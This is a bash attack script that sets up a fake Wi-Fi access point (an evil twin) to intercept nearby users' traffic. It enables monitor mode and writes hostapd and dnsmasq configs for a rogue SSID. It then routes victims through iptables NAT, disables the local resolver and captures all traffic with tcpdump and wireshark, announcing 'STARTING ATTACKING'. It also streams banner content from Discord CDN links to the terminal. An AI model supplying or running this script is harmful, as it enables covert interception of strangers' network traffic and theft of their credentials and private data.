#!/usr/bin/bash
#FIRST TIME ON EARTH
#Written By_ AuxGrep

BOLD="\033[01;01m"     
RED="\033[01;31m"      
GREEN="\033[01;32m"    
YELLOW="\033[01;33m"   
RESET="\033[00m"
UBlack='\033[4;30m'       # Black
URed='\033[4;31m'         # Red
UGreen='\033[4;32m'       # Green
UYellow='\033[4;33m'      # Yellow
UBlue='\033[4;34m'        # Blue
UPurple='\033[4;35m'      # Purple
UCyan='\033[4;36m'        # Cyan
UWhite='\033[4;37m'       # White

if [ $EUID -ne 0 ]; then # Super User Check
  echo -e "\\033[31mAborted, please execute the script as root!!Damn!!!\\033[0m"; exit 1
fi

banner=https://cdn.discordapp.com/attachments/951192813477965856/1001540315813003264/moon.animation
banner2=https://cdn.discordapp.com/attachments/951235506363047976/980442284321550386/auxgrep.vt

sudo cp /dev/null dnsmasq.conf #empty config
sudo cp /dev/null hostapd.conf #empty config

curl -s $banner|pv -q -L 9600
echo ""
echo -e $UPurple$BOLD"REQUIREMENTS CHECKING" $RESET
echo ""
bar ()
{
BAR='█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█'
for i in {1..35}; do
    echo -ne "\r${BAR:0:$i}" 
    sleep 0.03
done
}

sleep 3
if [  -e /usr/bin/pv ]; then
    echo -e $GREEN "[ ✔ ] pv ................[ found ]"
else 
	echo -e $RED "[ X ] pv -> not found "
	echo -e "\n [*] ${YELLOW} Installing pv ${RESET}\n"
	sudo apt-get install pv
fi

if [  -e /etc/hostapd ]; then
    echo -e $GREEN "[ ✔ ] hostapd ................[ found ]"
else 
	echo -e $RED "[ X ] hostapd -> not found "
	echo -e "\n [*] ${YELLOW} Installing hostapd ${RESET}\n"
	sudo apt-get install hostapd
fi

if [  -e /etc/dnsmasq.d ]; then
    echo -e $GREEN "[ ✔ ] dnsmasq ................[ found ]"
else 
	echo -e $RED "[ X ] dnsmasq -> not found "
	echo -e "\n [*] ${YELLOW} Installing dnsmasq ${RESET}\n"
	sudo apt-get install dnsmasq
fi

if [  -e /etc/apache2 ]; then
    echo -e $GREEN "[ ✔ ] apache2 ................[ found ]"
else 
	echo -e $RED "[ X ] apache2 -> not found "
	echo -e "\n [*] ${YELLOW} Installing apache2 ${RESET}\n"
	sudo apt-get install apache2
fi
sleep 4
curl -s $banner2|pv -q -L 9600 
echo -e $YELLOW "VIEWING EXTERNAL ADAPTER FOR MONITORING MODE FUCTIONS" $RESET
echo ""
lsusb -vv && sleep 1 && ifconfig
sleep 3
echo -e " $UPurple$BOLD [1] MONITORING MODE!!"$RESET
echo ""
read -p "Enter interface for monitoring mode function: " mode
sleep 2
airmon-ng start $mode
echo ""
sleep 4 && clear
echo -e " $UPurple$BOLD [2] MAKING HOSTAPD CONFIG"$RESET
clear
ifconfig
echo -e $YELLOW$BOLD"ENTER MONITORING MODE INTERFACE Eg: wlan0mon"$RESET
read -p "Enter interface: " int
echo "interface=$int" >> hostapd.conf
read -p "Enter a Name of your fake WIFI-AP: " wifi
echo ""
echo "driver=nl80211" >> hostapd.conf
echo "ssid=$wifi" >> hostapd.conf
echo "hw_mode=g" >> hostapd.conf
echo -e "Let's FInd a channel using air"
xterm -T "SCANNING FOR AP-CHANNEL" -e "sudo airodump-ng $int" &
read -p "Enter CHANNEL ID: " chn
echo "channel=$chn" >> hostapd.conf
echo "macaddr_acl=0" >> hostapd.conf
echo "ignore_broadcast_ssid=0" >> hostapd.conf
clear
echo -e "YOUR HOSTAPD CONFG"
echo ""
cat hostapd.conf && clear
echo -e "CONFIGURING DNSMASQ"
echo ""
echo "interface=$int" >> dnsmasq.conf
ifconfig
echo ""
echo -e $YELLOW$BOLD"ENTER ip different from your attacking machine, for example ur linux ip is 192.168.1.45
U can enter 192.168.1.50 and 192.168.1.76 respectively!"$RESET
echo ""
read -p "Enter IP subnet 1: " sub1
read -p "Enter IP subnet 2: " sub2
echo "dhcp-range=$sub1, $sub2, 255.255.255.0, 12h" >> dnsmasq.conf
echo ""
route -n
echo ""
read -p "Enter Gateway IP: " get 
echo "dhcp-option=3, $get" >> dnsmasq.conf
echo "dhcp-option=6, $get" >> dnsmasq.conf
echo "server=8.8.8.8" >> dnsmasq.conf
echo "log-queries" >> dnsmasq.conf
echo "log-dhcp" >> dnsmasq.conf
echo "listen-address=127.0.0.1" >> dnsmasq.conf
clear
echo -e $UPurple$BOLD"ASSAGNING IP'S" $RESET
ifconfig $int up $get netmask 255.255.255.0
route -n
echo ""
echo -e $YELLOW"ADD "0" at the end of route sq ip (DHC)"$RESET
echo ""
read -p "ENTER: " zero
route add -net $zero netmask 255.255.255.0 gw $get
clear
curl -s $banner|pv -q -L 9600 
echo -e $UPurple$BOLD"STARTING ATTACKING :)"$RESET
echo ""
sudo ss -lp "sport = :domain"
echo -e $RED$BOLD ">>>> PLEASE TEMINATE ANY DNS SESSION FROM DNSMASQ(use kill <PID>), If Not press Enter to continue <<<<"$RESET
read -p "Continue: " any_key
sudo systemctl stop systemd-resolved
xterm -T "DNSMASQ SERVER" -e "sudo dnsmasq -C dnsmasq.conf -d" &
sleep 2
xterm -T "STARTING FAKE ACCESS POINT $wifi" -e "sudo hostapd hostapd.conf" &
sleep 4
echo -e $YELLOW$BOLD"To provide the users with internet access, we need to forward traffic from the  virtual wireless adapter that is connected to the internet, to $int"$RESET
ifconfig
echo ""
read -p "ENter interface: " lol
iptables --table nat --append POSTROUTING --out-interface $lol -j MASQUERADE
iptables --append FORWARD --in-interface $int -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
clear
curl -s $banner2|pv -q -L 9600
sleep 3
clear
tcpdump -i $lol &
xterm -T "SNIFFING ON $int " -e "wireshark -k -i $int" &
clear
curl -s $banner2|pv -q -L 9600
echo -e $BOLD"GOOD LUCKY!!!!!"


